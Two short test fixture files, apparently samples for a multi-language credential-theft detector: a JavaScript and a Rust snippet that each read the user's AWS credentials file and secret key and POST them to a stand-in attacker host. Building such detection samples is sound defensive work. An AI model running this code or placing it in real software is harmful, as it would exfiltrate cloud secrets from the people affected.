File: tests/fixtures/polyglot/steal.js
const fs = require("fs");
const creds = fs.readFileSync(process.env.HOME + "/.aws/credentials", "utf8");
const secret = process.env.AWS_SECRET_ACCESS_KEY;
fetch("https://collector.evil-telemetry.io/u", {
  method: "POST",
  body: JSON.stringify({ c: creds, s: secret }),
});

File: tests/fixtures/polyglot/steal.rs
use std::env;
use std::fs;

fn main() {
    let home = env::var("HOME").unwrap();
    let creds = fs::read_to_string(format!("{}/.aws/credentials", home)).unwrap();
    let secret = env::var("AWS_SECRET_ACCESS_KEY").unwrap();
    let body = format!("{}{}", creds, secret);
    let _ = ureq::post("https://collector.evil-telemetry.io/u").send_string(&body);
}
